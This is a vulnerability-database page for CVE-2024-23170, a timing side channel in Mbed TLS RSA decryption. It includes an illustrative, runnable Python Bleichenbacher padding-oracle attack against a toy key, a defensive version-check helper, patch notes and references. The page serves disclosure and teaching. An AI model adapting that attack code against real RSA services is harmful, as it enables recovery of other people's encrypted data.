CVE-2024-23170
Description
Mbed TLS RSA private key operations have a timing side channel allowing plaintext recovery via many decryption messages.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2 are vulnerable to a timing side channel in private key RSA operations [1]. The channel leaks enough about the outcome of a private-key operation that an attacker who can time many decryptions of chosen ciphertexts can recover the plaintext of a message encrypted to the affected key.
Exploitation
The attacker must submit a large number of chosen ciphertexts for decryption and measure each decryption precisely enough; the advisory considers this achievable from a local position or from a remote host on a network close to the victim [1]. The attack is the one described in "Everlasting ROBOT: the Marvin Attack" by Hubert Kario: a Bleichenbacher-style chosen-ciphertext attack on RSA PKCS#1 v1.5 decryption in which the padding oracle is obtained from timing differences rather than from an error message, so a binary slow/fast signal per query is enough.
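The attack class the advisory names, as an added example (not Mbed TLS code, and not a reproduction of the library's internal leak): a toy RSA key, a PKCS#1 v1.5 decryptor whose padding check exits early, a "timing" oracle that sees only the decryptor's cost, and Bleichenbacher's interval-narrowing algorithm driven by that oracle. Timing is modelled as a deterministic tick counter rather than measured, so the example runs offline and reproducibly; the key, the message and the tick costs are constructed assumptions. A second decryptor with the hardened shape (every byte examined, failures folded into a flag) shows the cost difference disappearing.

```python
"""Bleichenbacher-style plaintext recovery from a timing-shaped padding oracle.
Added illustration, not Mbed TLS code: the leak is modelled as a cost counter."""
import random

# Constructed toy key from two well-known primes; far too small for real use.
P = (1 << 61) - 1                  # Mersenne prime M61
Q = (1 << 64) - 59                 # largest prime below 2^64
N, E = P * Q, 65537                # ~125-bit modulus, so the block length K is 16
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8
B = 1 << (8 * (K - 2))             # conforming PKCS#1 v1.5 plaintexts lie in [2B, 3B)

def pkcs1_v15_pad(msg: bytes, rng: random.Random) -> bytes:
    """EM = 00 || 02 || PS (>= 8 nonzero bytes) || 00 || M."""
    ps_len = K - 3 - len(msg)
    assert ps_len >= 8, "message too long for this modulus"
    return b"\x00\x02" + bytes(rng.randrange(1, 256) for _ in range(ps_len)) + b"\x00" + msg

def encrypt(em: bytes) -> int:
    return pow(int.from_bytes(em, "big"), E, N)

def decrypt_leaky(c: int):
    """Private-key op plus early-exit padding check; returns (msg or None, ticks)."""
    em = pow(c, D, N).to_bytes(K, "big")
    if em[0] != 0x00:
        return None, 1                              # rejected after one byte
    if em[1] != 0x02:
        return None, 2                              # rejected after two bytes
    sep = em.find(b"\x00", 2)
    ticks = 2 + ((K - 2) if sep == -1 else (sep - 1))   # bytes scanned for the separator
    if sep < 10:                                    # -1 (none) or fewer than 8 PS bytes
        return None, ticks
    return em[sep + 1:], ticks                      # anything past 00 02 costs > 2 ticks

def decrypt_constant_time(c: int):
    """Hardened shape: every byte examined, failures folded into a flag, cost fixed.
    (Under this cost model only; real code must also drop the data-dependent branch.)"""
    em = pow(c, D, N).to_bytes(K, "big")
    bad, sep, ticks = em[0] != 0x00 or em[1] != 0x02, -1, 2
    for i in range(2, K):
        ticks += 1
        if sep == -1 and em[i] == 0:
            sep = i
    return (None if bad or sep < 10 else em[sep + 1:]), ticks

def leak_visible(decrypt) -> bool:
    """Do a conforming and a non-conforming ciphertext cost differently?"""
    good = encrypt(b"\x00\x02" + b"\x11" * (K - 4) + b"\x00" + b"x")
    bad = encrypt(b"\x00\x01" + b"\x11" * (K - 4) + b"\x00" + b"x")
    return decrypt(good)[1] != decrypt(bad)[1]

def make_timing_oracle(decrypt):
    """All the attacker gets: slow or fast, never the plaintext. Also counts queries."""
    calls = [0]
    def oracle(c: int) -> bool:
        calls[0] += 1
        return decrypt(c)[1] > 2                    # "slow" == passed the 00 02 check
    return oracle, calls

def ceil_div(a: int, b: int) -> int:
    return -(-a // b)

def bleichenbacher(c0: int, oracle) -> int:
    """Recover m = c0^d mod N from the oracle alone (Bleichenbacher, CRYPTO '98).
    c0 is a genuine conforming ciphertext, so the blinding step 1 is skipped."""
    M = [(2 * B, 3 * B - 1)]
    s = ceil_div(N, 3 * B)                          # step 2a: first conforming s
    while not oracle(c0 * pow(s, E, N) % N):
        s += 1
    while True:
        new = set()                                 # step 3: narrow the intervals
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo, hi = max(a, ceil_div(2 * B + r * N, s)), min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new.add((lo, hi))
        M = sorted(new)
        if len(M) == 1 and M[0][0] == M[0][1]:      # step 4: one candidate left
            return M[0][0]
        if len(M) > 1:                              # step 2b: linear search again
            s += 1
            while not oracle(c0 * pow(s, E, N) % N):
                s += 1
            continue
        a, b = M[0]                                 # step 2c: targeted search
        r = ceil_div(2 * (b * s - 2 * B), N)
        while True:
            hit = next((t for t in range(ceil_div(2 * B + r * N, b), (3 * B - 1 + r * N) // a + 1)
                        if oracle(c0 * pow(t, E, N) % N)), None)
            if hit is not None:
                s = hit
                break
            r += 1

def demo(seed: int = 1):
    """Encrypt a short message, then recover it from the leaky decryptor's cost alone."""
    em = pkcs1_v15_pad(b"pwn", random.Random(seed))
    oracle, calls = make_timing_oracle(decrypt_leaky)
    recovered = bleichenbacher(encrypt(em), oracle).to_bytes(K, "big")
    return recovered[recovered.index(b"\x00", 2) + 1:], calls[0]
```

`demo()` returns the recovered message and the number of oracle queries it took (a few thousand for this toy modulus, since the chance that a random multiplier lands in [2B, 3B) is about B/N). The advisory places the real leak in Mbed TLS's private-key RSA operations themselves, not in a padding check like the one above, and the 2.28.7 / 3.5.2 fix is in the library's own code; what carries over is the shape of the attack: many chosen ciphertexts, a binary slow/fast signal per query, and full plaintext recovery.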
Impact
Successful exploitation recovers the plaintext of messages encrypted to the affected RSA key [1], a confidentiality breach of whatever those messages carry.
Mitigation
The vulnerability is fixed in Mbed TLS 2.28.7 and 3.5.2 [1]; users on the 2.28 branch should upgrade to 2.28.7 or later and users on 3.x to 3.5.2 or later. No workaround is available.
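A version check for the fixed releases, as an added helper (not part of Mbed TLS): it parses the MAJOR.MINOR.PATCH string that `MBEDTLS_VERSION_STRING` (build_info.h in 3.x, version.h in 2.x) and `mbedtls_version_get_string()` report and compares it against the fixed version on that branch. The sample header line is constructed.

```python
"""Is a reported Mbed TLS version below the fix for CVE-2024-23170?
Added helper, not part of Mbed TLS; compares upstream MAJOR.MINOR.PATCH numbers."""
import re

FIXED = {2: (2, 28, 7), 3: (3, 5, 2)}   # fixed releases from the advisory, by major branch
_VER = re.compile(r"(\d+)\.(\d+)\.(\d+)")
_DEFINE = re.compile(r'#define\s+MBEDTLS_VERSION_STRING\s+"([^"]+)"')

def parse_version(text: str):
    """First MAJOR.MINOR.PATCH triple found in text, as a comparable tuple."""
    m = _VER.search(text)
    if m is None:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(x) for x in m.groups())

def is_vulnerable(version: str):
    """True if below the fixed release on its branch, False if at or above it,
    None if the major branch is not covered by the advisory (e.g. a 4.x string)."""
    v = parse_version(version)
    fixed = FIXED.get(v[0])
    return None if fixed is None else v < fixed

def vulnerable_in_header(header_text: str):
    """Scan the text of build_info.h / version.h for MBEDTLS_VERSION_STRING."""
    m = _DEFINE.search(header_text)
    return None if m is None else is_vulnerable(m.group(1))

# Constructed sample of the define as it appears in a 3.5.1 build_info.h.
SAMPLE_HEADER = '#define MBEDTLS_VERSION_STRING         "3.5.1"\n'
```

The check only understands upstream version numbers. The openSUSE coordinates below are keyed to the upstream 2.28.7 and 3.5.2 releases, so they line up, but a distribution that backports the fix under an older version string would be reported as vulnerable here; for such packages the distribution's own advisory is the authority.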
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Mbed TLS / Mbed TLS (from description)
- OSV coordinates (4 versions, no CPE):
  - pkg:rpm/opensuse/mbedtls-2&distro=openSUSE%20Tumbleweed: < 2.28.7-1.1
  - pkg:rpm/opensuse/mbedtls&distro=openSUSE%20Leap%2015.5: < 2.28.7-bp155.2.3.1
  - pkg:rpm/opensuse/mbedtls&distro=openSUSE%20Tumbleweed: < 3.5.2-1.1
  - pkg:rpm/suse/mbedtls&distro=SUSE%20Package%20Hub%2015%20SP5: < 2.28.7-bp155.2.3.1
Patches
2 patches
1 file changed · +1 −1
BRANCHES.md+1 −1 modified@@ -106,6 +106,6 @@ The following branches are currently maintained: - [`development`](https://github.com/Mbed-TLS/mbedtls/) - [`mbedtls-2.28`](https://github.com/Mbed-TLS/mbedtls/tree/mbedtls-2.28) maintained until at least the end of 2024, see - <https://github.com/Mbed-TLS/mbedtls/releases/tag/v2.28.6>. + <https://github.com/Mbed-TLS/mbedtls/releases/tag/v2.28.7>. Users are urged to always use the latest version of a maintained branch.
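Review bot: not the security fix: the only change in this hunk is the mbedtls-2.28 release link in BRANCHES.md moving from the v2.28.6 tag to the v2.28.7 tag, with no RSA or bignum code touched, so anyone tracing CVE-2024-23170 to code should treat this as the release bookkeeping that accompanied 2.28.7 and read the 2.28.7 / 3.5.2 release contents for the actual change. Labelling it as such on the page would stop readers from taking it for the patch.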
1 file changed · +1 −1
BRANCHES.md+1 −1 modified@@ -76,6 +76,6 @@ The following branches are currently maintained: - [`development`](https://github.com/Mbed-TLS/mbedtls/) - [`mbedtls-2.28`](https://github.com/Mbed-TLS/mbedtls/tree/mbedtls-2.28) maintained until at least the end of 2024, see - <https://github.com/Mbed-TLS/mbedtls/releases/tag/v2.28.6>. + <https://github.com/Mbed-TLS/mbedtls/releases/tag/v2.28.7>. Users are urged to always use the latest version of a maintained branch.
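Review bot: this is the same one-line v2.28.6 to v2.28.7 link bump as the previous patch, landing at a different offset in BRANCHES.md (@@ -76,6 +76,6 @@ instead of @@ -106,6 +106,6 @@), which is what the same docs change looks like on a second branch; if both entries are kept, a short label saying which branch each came from would make the list usable, and neither contains the timing-side-channel fix itself.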
Vulnerability mechanics
No source-code context for this CVE: mechanics are only generated when we can read the actual fix diff, and the two linked patches touch only BRANCHES.md. Without the fix diff, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
- [1] mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2024-01-1/ (NVD; vendor advisory)
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GP5UU7Z6LJNBLBT4SC5WWS2HDNMTFZH5/ (NVD; Fedora package announcement)
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIBPEYSVRK4IFLBSYJAWKH33YBNH5HR2/ (NVD; Fedora package announcement)
News mentions
No linked articles in our index yet.